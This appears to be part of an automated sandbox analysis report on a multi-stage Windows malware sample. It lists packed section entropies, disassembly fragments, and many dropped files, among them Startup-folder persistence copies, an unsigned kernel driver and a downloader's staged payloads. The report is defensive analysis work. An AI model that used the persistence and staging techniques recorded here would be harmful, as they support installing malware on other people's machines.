                          Source: random[1].exe1.5.drStatic PE information: section name: ulxuyjiv
                          Source: random[1].exe1.5.drStatic PE information: section name: scqvijkn
                          Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .idata
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: ulxuyjiv
                          Source: e44fda3216.exe.5.drStatic PE information: section name: scqvijkn
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.5.drStatic PE information: section name: .didat
                          Source: random[1].exe2.5.drStatic PE information: section name: _RDATA
                          Source: db3cab6cee.exe.5.drStatic PE information: section name: .didat
                          Source: db3cab6cee.exe.5.drStatic PE information: section name: _RDATA
                          Source: pcqxl.exe.9.drStatic PE information: section name: .00cfg
                          Source: is-VSE52.tmp.15.drStatic PE information: section name: .xdata
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6D91C push ecx; ret 0_2_00E6D92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E61359 push es; ret 0_2_00E6135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0041D91C push ecx; ret 1_2_0041D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00450193 push cs; retn 0004h5_2_00450196
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041D91C push ecx; ret 5_2_0041D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0043DEDB push ss; iretd 5_2_0043DEDC
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041DFC6 push ecx; ret 5_2_0041DFD9
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534A88F pushad ; iretd 11_3_0534AA31
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB66 push 680534CBh; retf 11_3_0534CB6D
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB62 pushad ; retf 11_3_0534CB65
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB52 push eax; retf 11_3_0534CB55
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB5E pushad ; retf 11_3_0534CB61
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB4E push eax; retf 11_3_0534CB51
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534FC2D push 0000005Ah; retf 11_3_0534FC34
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350115 push ecx; ret 11_3_05350151
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB66 push 680534CBh; retf 11_3_0534CB6D
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB62 pushad ; retf 11_3_0534CB65
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB52 push eax; retf 11_3_0534CB55
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB5E pushad ; retf 11_3_0534CB61
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350158 push eax; ret 11_3_05350159
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB4E push eax; retf 11_3_0534CB51
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534FC2D push 0000005Ah; retf 11_3_0534FC34
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350115 push ecx; ret 11_3_05350151
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB66 push 680534CBh; retf 11_3_0534CB6D
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB62 pushad ; retf 11_3_0534CB65
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB52 push eax; retf 11_3_0534CB55
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB5E pushad ; retf 11_3_0534CB61
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350158 push eax; ret 11_3_05350159
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB4E push eax; retf 11_3_0534CB51
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_00619378 push ecx; retf 0064h11_3_0061939A
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_00619378 push ecx; retf 0064h11_3_0061939A
                          Source: file.exeStatic PE information: section name: entropy: 7.060098617572218
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.060098617572218
                          Source: random[1].exe.5.drStatic PE information: section name: irrkukjx entropy: 7.947685674530026
                          Source: 718e743381.exe.5.drStatic PE information: section name: irrkukjx entropy: 7.947685674530026
                          Source: random[2].exe.5.drStatic PE information: section name: hasiulpx entropy: 7.957119984224612
                          Source: 739ad26354.exe.5.drStatic PE information: section name: hasiulpx entropy: 7.957119984224612
                          Source: random[1].exe1.5.drStatic PE information: section name: entropy: 7.979144122611361
                          Source: random[1].exe1.5.drStatic PE information: section name: ulxuyjiv entropy: 7.954361069139487
                          Source: e44fda3216.exe.5.drStatic PE information: section name: entropy: 7.979144122611361
                          Source: e44fda3216.exe.5.drStatic PE information: section name: ulxuyjiv entropy: 7.954361069139487
                          Source: Ele.exe.6.drStatic PE information: section name: .text entropy: 7.993828569787845

                          Persistence and Installation Behavior

                          barindex
                          Found pyInstaller with non standard icon
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeProcess created: "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                          Sample is not signed and drops a device driver
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\TEMP\aodefromlpug.sys
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyexpat.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\python311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pywintypes311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_strxor.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\select.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\is-4SN19.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Roaming\9rpcss_1.drv (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpJump to dropped file
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\Temp\aodefromlpug.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\NzL6O1Q.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeFile created: C:\Users\user\AppData\Local\Temp\pcqxl.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pythoncom311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psutil_windows.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmorph.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeFile created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zjFtdxQ[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Roaming\is-VSE52.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\python3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA384.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_strxor.pydJump to dropped file
